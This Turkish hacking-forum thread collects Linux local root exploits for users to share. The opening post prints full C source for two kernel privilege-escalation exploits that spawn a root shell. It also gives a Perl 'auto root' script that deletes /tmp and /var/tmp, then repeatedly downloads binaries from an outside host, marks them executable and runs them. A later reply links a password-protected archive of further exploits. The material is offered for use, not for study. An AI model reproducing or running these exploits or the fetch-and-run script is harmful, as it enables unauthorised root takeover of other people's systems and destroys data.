Konuyu Oyla:
  • Derecelendirme: 5/5 - 2 oy
  • 1
  • 2
  • 3
  • 4
  • 5
Local Root Exploitler Bu Konu Altında
#1
Merhaba arkadaşlar, herkez burda elinde olan local root exploitleri paylaşabilir. Herkez yararlansın exciting


Linux 2.6.18 408 / 3.2.6 2012 Local Root Exploit:
Kod:
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <syscall.h>
#include <signal.h>
#include <time.h>
#include <sched.h>

#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/wait.h>

#include <asm/page.h>

#define MREMAP_MAYMOVE    1
#define MREMAP_FIXED    2

#define str(s)     #s
#define xstr(s) str(s)

#define DSIGNAL        SIGCHLD
#define CLONEFL        (DSIGNAL|CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_VFORK)
#define PAGEADDR    0x2000

#define RNDINT        512

#define NUMVMA        (3 * 5 * 257)
#define NUMFORK        (17 * 65537)

#define DUPTO        1000
#define TMPLEN        256

#define __NR_sys_mremap    163

_syscall5(ulong, sys_mremap, ulong, a, ulong, b, ulong, c, ulong, d, ulong, e);
unsigned long sys_mremap(unsigned long addr, unsigned long old_len, unsigned long
new_len,
             unsigned long flags, unsigned long new_addr);


static volatile int pid = 0, ppid, hpid, *victim, *fops, blah = 0, dummy = 0, uid,
gid;
static volatile int *vma_ro, *vma_rw, *tmp;
static volatile unsigned fake_file[16];


**** fatal(const char * msg)
{
    printf("\n");
    if (!errno) {
        fprintf(stderr, "FATAL: %s\n", msg);
    } else {
        perror(msg);
    }

    printf("\nentering endless loop");
    fflush(stdout);
    fflush(stderr);
    while (1) pause();
}

**** kernel_code(**** * file, loff_t offset, int origin)
{
    int i, c;
    int *v;

    if (!file)
        goto out;

    __asm__("movl    %%esp, %0" : : "m" (c));

    c &= 0xffffe000;
    v = (**** *) c;

    for (i = 0; i < PAGE_SIZE / sizeof(*v) - 1; i++) {
        if (v[i] == uid && v[i+1] == uid) {
            i++; v[i++] = 0; v[i++] = 0; v[i++] = 0;
        }
        if (v[i] == gid) {
            v[i++] = 0; v[i++] = 0; v[i++] = 0; v[i++] = 0;
            break;
        }
    }
out:
    dummy++;
}

**** try_to_exploit(****)
{
    int v = 0;

    v += fops[0];
    v += fake_file[0];

    kernel_code(0, 0, v);
    lseek(DUPTO, 0, SEEK_SET);

    if (geteuid()) {
        printf("\nFAILED uid!=0"); fflush(stdout);
        errno =- ENOSYS;
        fatal("uid change");
    }

    printf("\n[+] PID %d GOT UID 0, enjoy!", getpid()); fflush(stdout);

    kill(ppid, SIGUSR1);
    setresuid(0, 0, 0);
    sleep(1);

    printf("\n\n"); fflush(stdout);

    execl("/bin/bash", "bash", NULL);
    fatal("burp");
}

**** cleanup(int v)
{
    victim[DUPTO] = victim[0];
    kill(0, SIGUSR2);
}


**** redirect_filp(int v)
{
    printf("\n[!] parent check race... "); fflush(stdout);

    if (victim[DUPTO] && victim[0] == victim[DUPTO]) {
        printf("SUCCESS, cought SLAB page!"); fflush(stdout);
        victim[DUPTO] = (unsigned) & fake_file;
        signal(SIGUSR1, &cleanup);
        kill(pid, SIGUSR1);
    } else {
        printf("FAILED!");
    }
    fflush(stdout);
}

int get_slab_objs(****)
{
    FILE * fp;
    int c, d, u = 0, a = 0;
    static char line[TMPLEN], name[TMPLEN];

    fp = fopen("/proc/slabinfo", "r");
    if (!fp)
        fatal("fopen");

    fgets(name, sizeof(name) - 1, fp);
    do {
        c = u = a =- 1;
        if (!fgets(line, sizeof(line) - 1, fp))
            break;
c = sscanf(line, "%s %u %u %u %u %u %u", name, &u, &a, &d, &d, &d, &d);
    } while (strcmp(name, "size-4096"));
  
    fclose(fp);

    return c == 7 ? a - u : -1;
}

**** unprotect(int v)
{
    int n, c = 1;

    *victim = 0;
    printf("\n[+] parent unprotected PTE "); fflush(stdout);

    dup2(0, 2);
    while (1) {
        n = get_slab_objs();
        if (n < 0)
            fatal("read slabinfo");
        if (n > 0) {
            printf("\n    depopulate SLAB #%d", c++);
            blah = 0; kill(hpid, SIGUSR1);
            while (!blah) pause();
        }
        if (!n) {
            blah = 0; kill(hpid, SIGUSR1);
            while (!blah) pause();
            dup2(0, DUPTO);
            break;
        }
    }

    signal(SIGUSR1, &redirect_filp);
    kill(pid, SIGUSR1);
}

**** cleanup_vmas(****)
{
    int i = NUMVMA;

    while (1) {
        tmp = mmap((**** *) (PAGEADDR - PAGE_SIZE), PAGE_SIZE, PROT_READ,
                MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, 0, 0);
        if (tmp != (**** *) (PAGEADDR - PAGE_SIZE)) {
            printf("\n[-] ERROR unmapping %d", i); fflush(stdout);
            fatal("unmap1");
        }
        i--;
        if (!i)
            break;

    tmp = mmap((**** *) (PAGEADDR - PAGE_SIZE), PAGE_SIZE, PROT_READ|PROT_WRITE,
                MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
    if (tmp != (**** *) (PAGEADDR - PAGE_SIZE)) {
            printf("\n[-] ERROR unmapping %d", i); fflush(stdout);
            fatal("unmap2");
        }
        i--;
        if (!i)
            break;
    }
}

**** catchme(int v)
{
    blah++;
}

**** exitme(int v)
{
    _exit(0);
}

**** childrip(int v)
{
    waitpid(-1, 0, WNOHANG);
}

**** slab_helper(****)
{
    signal(SIGUSR1, &catchme);
    signal(SIGUSR2, &exitme);
    blah = 0;

    while (1) {
        while (!blah) pause();

        blah = 0;
        if (!fork()) {
            dup2(0, DUPTO);
            kill(getppid(), SIGUSR1);
            while (1) pause();
        } else {
            while (!blah) pause();
            blah = 0; kill(ppid, SIGUSR2);
        }
    }
    exit(0);
}

int main(****)
{
    int i, r, v, cnt;
    time_t start;

    srand(time(NULL) + getpid());
    ppid = getpid();
    uid = getuid();
    gid = getgid();

    hpid = fork();
    if (!hpid)
        slab_helper();

    fops = mmap(0, PAGE_SIZE, PROT_EXEC|PROT_READ|PROT_WRITE,
            MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
    if (fops == MAP_FAILED)
        fatal("mmap fops VMA");
    for (i = 0; i < PAGE_SIZE / sizeof(*fops); i++)
        fops[i] = (unsigned)&kernel_code;
    for (i = 0; i < sizeof(fake_file) / sizeof(*fake_file); i++)
        fake_file[i] = (unsigned)fops;

    vma_ro = mmap(0, PAGE_SIZE, PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
    if (vma_ro == MAP_FAILED)
        fatal("mmap1");

    vma_rw = mmap(0, PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
    if (vma_rw == MAP_FAILED)
        fatal("mmap2");

    cnt = NUMVMA;
    while (1) {
        r = sys_mremap((ulong)vma_ro, 0, 0, MREMAP_FIXED|MREMAP_MAYMOVE, PAGEADDR);
        if (r == (-1)) {
            printf("\n[-] ERROR remapping"); fflush(stdout);
            fatal("remap1");
        }
        cnt--;
        if (!cnt) break;

        r = sys_mremap((ulong)vma_rw, 0, 0, MREMAP_FIXED|MREMAP_MAYMOVE, PAGEADDR);
        if (r == (-1)) {
            printf("\n[-] ERROR remapping"); fflush(stdout);
            fatal("remap2");
        }
        cnt--;
        if (!cnt) break;
    }

    victim = mmap((*****)PAGEADDR, PAGE_SIZE, PROT_EXEC|PROT_READ|PROT_WRITE,
            MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
    if (victim != (**** *) PAGEADDR)
        fatal("mmap victim VMA");

    v = *victim;
    *victim = v + 1;

    signal(SIGUSR1, &unprotect);
    signal(SIGUSR2, &catchme);
    signal(SIGCHLD, &childrip);
    printf("\n[+] Please wait...HEAVY SYSTEM LOAD!\n"); fflush(stdout);
    start = time(NULL);

    cnt = NUMFORK;
    v = 0;
    while (1) {
        cnt--;
        v--;
        dummy += *victim;

        if (cnt > 1) {
            __asm__(
            "pusha                \n"
            "movl %1, %%eax            \n"
            "movl $("xstr(CLONEFL)"), %%ebx    \n"
            "movl %%esp, %%ecx        \n"
            "movl $120, %%eax        \n"
            "int  $0x80            \n"
            "movl %%eax, %0            \n"
            "popa                \n"
            : : "m" (pid), "m" (dummy)
            );
        } else {
            pid = fork();
        }

        if (pid) {
            if (v <= 0 && cnt > 0) {
                float eta, tm;
                v = rand() % RNDINT / 2 + RNDINT / 2;
                tm = eta = (float)(time(NULL) - start);
                eta *= (float)NUMFORK;
                eta /= (float)(NUMFORK - cnt);
                printf("\r\t%u of %u [ %u %%  ETA %6.1f s ]          ",
                NUMFORK - cnt, NUMFORK, (100 * (NUMFORK - cnt)) / NUMFORK, eta - tm);
                fflush(stdout);
            }
            if (cnt) {
                waitpid(pid, 0, 0);
                continue;
            }
            if (!cnt) {
                while (1) {
                     r = wait(NULL);
                     if (r == pid) {
                    cleanup_vmas();
                    while (1) { kill(0, SIGUSR2); kill(0, SIGSTOP); pause(); }
                     }
                }
            }
        }

        else {
            cleanup_vmas();

            if (cnt > 0) {
                _exit(0);
            }

        printf("\n[+] rooting done..the moment of truth..."); fflush(stdout);
            sleep(1);

            signal(SIGUSR1, &catchme);
            munmap(0, PAGE_SIZE);
            dup2(0, 2);
            blah = 0; kill(ppid, SIGUSR1);
            while (!blah) pause();

            munmap((**** *)victim, PAGE_SIZE);
            dup2(0, DUPTO);

            blah = 0; kill(ppid, SIGUSR1);
            while (!blah) pause();
            try_to_exploit();
            while (1) pause();
        }
    }
    return 0;
}
2.6.37-3.8.10 Kernel 2013 Root Exploit:
Kod:
#define _GNU_SOURCE 1
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <syscall.h>
#include <stdint.h>
#include <assert.h>

#define BASE  0x380000000
#define SIZE  0x010000000
#define KSIZE  0x2000000
#define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337))))

void fuck() {
        int i,j,k;
        uint64_t uids[4] = { AB(2), AB(3), AB(4), AB(5) };
        uint8_t *current = *(uint8_t **)(((uint64_t)uids) & (-8192));
        uint64_t kbase = ((uint64_t)current)>>36;
        uint32_t *fixptr = (void*) AB(1);
        *fixptr = -1;

        for (i=0; i<4000; i+=4) {
                uint64_t *p = (void *)&current[i];
                uint32_t *t = (void*) p[0];
                if ((p[0] != p[1]) || ((p[0]>>36) != kbase)) continue;
                for (j=0; j<20; j++) { for (k = 0; k < 8; k++)
                        if (((uint32_t*)uids)[k] != t[j+k]) goto next;
                        for (i = 0; i < 8; i++) t[j+i] = 0;
                        for (i = 0; i < 10; i++) t[j+9+i] = -1;
                        return;
next:;          }
        }
}

void sheep(uint32_t off) {
        uint64_t buf[10] = { 0x4800000001,off,0,0,0,0x300 };
        int fd = syscall(298, buf, 0, -1, -1, 0);
        assert(!close(fd));
}


int     main() {
        uint64_t  u,g,needle, kbase, *p; uint8_t *code;
        uint32_t *map, j = 5;
        int i;
        struct {
                uint16_t limit;
                uint64_t addr;
        } __attribute__((packed)) idt;
        assert((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE);
        memset(map, 0, SIZE);
        sheep(-1); sheep(-2);
        for (i = 0; i < SIZE/4; i++) if (map[i]) {
                assert(map[i+1]);
                break;
        }
        assert(i<SIZE/4);
        asm ("sidt %0" : "=m" (idt));
        kbase = idt.addr & 0xff000000;
        u = getuid(); g = getgid();
        assert((code = (void*)mmap((void*)kbase, KSIZE, 7, 0x32, 0, 0)) == (void*)kbase);
        memset(code, 0x90, KSIZE); code += KSIZE-1024; memcpy(code, &fuck, 1024);
        memcpy(code-13,"\x0f\x01\xf8\xe8\5\0\0\0\x0f\x01\xf8\x48\xcf",
                printf("2.6.37-3.x x86_64\nsd@fucksheep.org 2010\n") % 27);
        setresuid(u,u,u); setresgid(g,g,g);
        while (j--) {
                needle = AB(j+1);
                assert(p = memmem(code, 1024, &needle, 8));
                if (!p) continue;
                *p = j?((g<<32)|u):(idt.addr + 0x48);
        }
        sheep(-i + (((idt.addr&0xffffffff)-0x80000000)/4) + 16);
        asm("int $0x4");        assert(!setuid(0));
        return execl("/bin/bash", "-sh", NULL);
}
Linux Auto Root 2011-2012:
Kod:
#!/usr/bin/perl
# B1M0KH
{
system("rm -rf /tmp/*");
system("rm -rf /var/tmp/*");
system("wget http://kabooos.persiangig.com/r00t/audit");
system("chmod 777 audit");
system("./audit");
system("id");
system("./audit");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/1");
system("chmod 777 1");
system("./1");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget 1-2 http://kabooos.persiangig.com/r00t/1-2");
system("chmod 777 1-2");
system("./1-2");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget 1-3 http://kabooos.persiangig.com/r00t/1-3");
system("chmod 777 1-3");
system("./1-3");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/1-4");
system("chmod 777 1-4");
system("./1-4");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://kabooos.persiangig.com/r00t/2");
system("chmod 777 2");
system("./2");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget 2-1 http://kabooos.persiangig.com/r00t/2-1");
system("chmod 777 2-1");
system("./2-1");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/3");
system("chmod 777 3");
system("./3");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/4");
system("chmod 777 4");
system("./4");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/5");
system("chmod 777 5");
system("./5");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/6");
system("chmod 777 6");
system("./6");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/7");
system("chmod 777 7");
system("./7");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/8");
system("chmod 777 8");
system("./8");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/9");
system("chmod 777 9");
system("./9");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/10");
system("chmod 777 10");
system("./10");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/11");
system("chmod 777 11");
system("./11");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/13.py");
system("chmod 777 13.py");
system("python 13.py");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/14");
system("chmod 777 14");
system("./14");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/15.sh");
system("chmod 777 15.sh");
system("./15.sh");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/16");
system("chmod 777 16");
system("./16");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/16-1");
system("chmod 777 16-1");
system("./16-1");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/bru1.tar.gz");
system("tar xzf bru1.tar.gz");
sleep(1);
system("chmod 777 run");
system("./run");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/bru2.tar.gz");
system("tar xzf bru2.tar.gz");
sleep(1);
system("chmod 777 run");
system("./run");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/bru3.tar.gz");
system("tar xzf bru3.tar.gz");
sleep(1);
system("chmod 777 run.sh");
system("./run.sh");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/exploit");
system("chmod 777 exploit");
system("./exploit");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/pwnkernel");
system("chmod 777 pwnkernel");
system("chmod 777 pwnkernel");
system("./pwnkernel");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/bru.tar.gz");
system("tar xzf bru.tar.gz");
sleep(1);
system("sed -i '/turn_\(on\|off\)_wp();/d' exploit.c");
system("sh run_null_exploits.sh");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget 44 http://kabooos.persiangig.com/r00t/44");
system("chmod 777 44");
system("./44");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/7x");
system("chmod 777 7x");
system("./7x");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/7-2");
system("chmod 777 7-2");
system("./7-2");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/exp1");
system("chmod 777 exp1");
system("./exp1");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/exp2");
system("chmod 777 exp2");
system("./exp2");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/exp3");
system("chmod 777 exp3");
system("./exp3");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/runx");
system("chmod 777 runx");
system("./runx");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/root1");
system("chmod 777 root1");
system("./root1");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/rot");
system("chmod 777 rot");
system("./rot");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/36-rc1");
system("chmod 777 36-rc1");
system("./36-rc1");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/18");
system("chmod 777 18");
system("./18");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/15150");
system("chmod 777 15150");
system("./15150");
system("./15150 0xc0102290 64");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/31");
system("chmod 777 31");
system("./31");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/ubuntu");
system("chmod 777 ubuntu");
system("./ubuntu");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/lenis.sh");
system("chmod 777 lenis.sh");
system("./lenis.sh");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/gayros");
system("chmod 777 gayros");
system("./gayros");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/full-nelson");
system("chmod 777 full-nelson");
system("./full-nelson");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/2-6-37");
system("chmod 777 2-6-37");
system("./2-6-37");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/tivoli");
system("chmod 777 tivoli");
system("./tivoli");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/13x");
system("chmod 777 13x");
system("./13x");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/15200");
system("chmod 777 15200");
system("./15200");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/ameri...n-language");
system("chmod 777 american-sign-language");
system("./american-sign-language");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/z1d-2011");
system("chmod 777 z1d-2011");
system("./z1d-2011");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/18-5");
system("chmod 777 18-5");
system("./18-5");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/2.6.18-164-2010");
system("chmod 777 2.6.18-164-2010");
system("./2.6.18-164-2010");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/2.6.18-194.1-2010");
system("chmod 777 2.6.18-194.1-2010");
system("./2.6.18-194.1-2010");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/2.6.18-194.2-2010");
system("chmod 777 2.6.18-194.2-2010");
system("./2.6.18-194.2-2010");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/2.6.37");
system("chmod 777 2.6.37");
system("./2.6.37");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/2.6.37-rc2");
system("chmod 777 2.6.37-rc2");
system("./2.6.37-rc2");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/2.6.33");
system("chmod 777 2.6.33");
system("./2.6.33");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/2.6.34-2011Exploit1");
system("chmod 777 2.6.34-2011Exploit1");
system("./2.6.34-2011Exploit1");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/2.6.18-194");
system("chmod 777 2.6.18-194");
system("./2.6.18-194");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/2.6.18-274-2011");
system("chmod 777 2.6.18-274-2011");
system("./2.6.18-274-2011");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/2.6.33-2011");
system("chmod 777 2.6.33-2011");
system("./2.6.33-2011");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/2.6.18-6-x86-2011");
system("chmod 777 2.6.18-6-x86-2011");
system("./2.6.18-6-x86-2011");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/2.6.28-2011");
system("chmod 777 2.6.28-2011");
system("./2.6.28-2011");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/2.6.34-2011Exploit1");
system("chmod 777 2.6.34-2011Exploit1");
system("./2.6.34-2011Exploit1");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/2.6.34-2011Exploit2");
system("chmod 777 2.6.34-2011Exploit2");
system("./2.6.34-2011Exploit2");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/local...oit-gayros");
system("chmod 777 local-root-exploit-gayros");
system("./local-root-exploit-gayros");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/vmspl...ot-exploit");
system("chmod 777 vmsplice-local-root-exploit");
system("./vmsplice-local-root-exploit");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/2-6-32-46-2011");
system("chmod 777 2-6-32-46-2011");
system("./2-6-32-46-2011");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/2.6.1...1.el5-2012");
system("chmod 777 2.6.18-374.12.1.el5-2012");
system("./2.6.18-374.12.1.el5-2012");
system("id");
print "\n\n--- Shared bY h4x0r HuSsY ---\n\n";
}
Beğenenler:
#2
Eyvallah
Beğenenler:
#3
Kod:
Local Root Exploit =>
2006
2007
2008
2009
2010
2011
2.6.18 2012
2.6.32 2012 and 2013 ( bir tanesi çalışıyor )
FreeBSD 7,7.1,8
Autoroot 2011 And 2012
And Also Windows NT User Privilege Escalation
http://www.mediafire.com/download/6047p6fbbldafam/locals+updated-Ch3rn0by1.rar
Şifresi => box3dup
www.deccal.org


Beğenenler: 02d3

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  Wordpress 2015 mTheme-Unus Teması Açıgı Local Host Çaresi r00tturk 42 1,733 21-11-2016, Saat: 23:51
Son Yorum: Efetimi
  Linux x86_64 Privilege Escalation Local Root Exploit KingSkrupellos 1 74 08-11-2016, Saat: 16:09
Son Yorum: RedLife
  Joomla Exploitler Zaafiyetlerin İsimleri - 2006 & 2015 KingSkrupellos 8 450 04-11-2016, Saat: 17:40
Son Yorum: Kolonkun
  Joomla Fsave 2.0 Local File Disclosure Mr.F92 11 600 02-11-2016, Saat: 22:01
Son Yorum: Kolonkun
  Asan/Suid Local Root Exploit KingSkrupellos 0 24 28-10-2016, Saat: 08:28
Son Yorum: KingSkrupellos
Anahtar Kelimeler

Local Root Exploitler Bu Konu Altında indir, Local Root Exploitler Bu Konu Altında Videosu, Local Root Exploitler Bu Konu Altında Online izle, Local Root Exploitler Bu Konu Altında Bedava indir, Local Root Exploitler Bu Konu Altında Yükle, Local Root Exploitler Bu Konu Altında Hakkında, Local Root Exploitler Bu Konu Altında Nedir, Local Root Exploitler Bu Konu Altında Free indir, Local Root Exploitler Bu Konu Altında Oyunu, Local Root Exploitler Bu Konu Altında Download


1 Ziyaretçi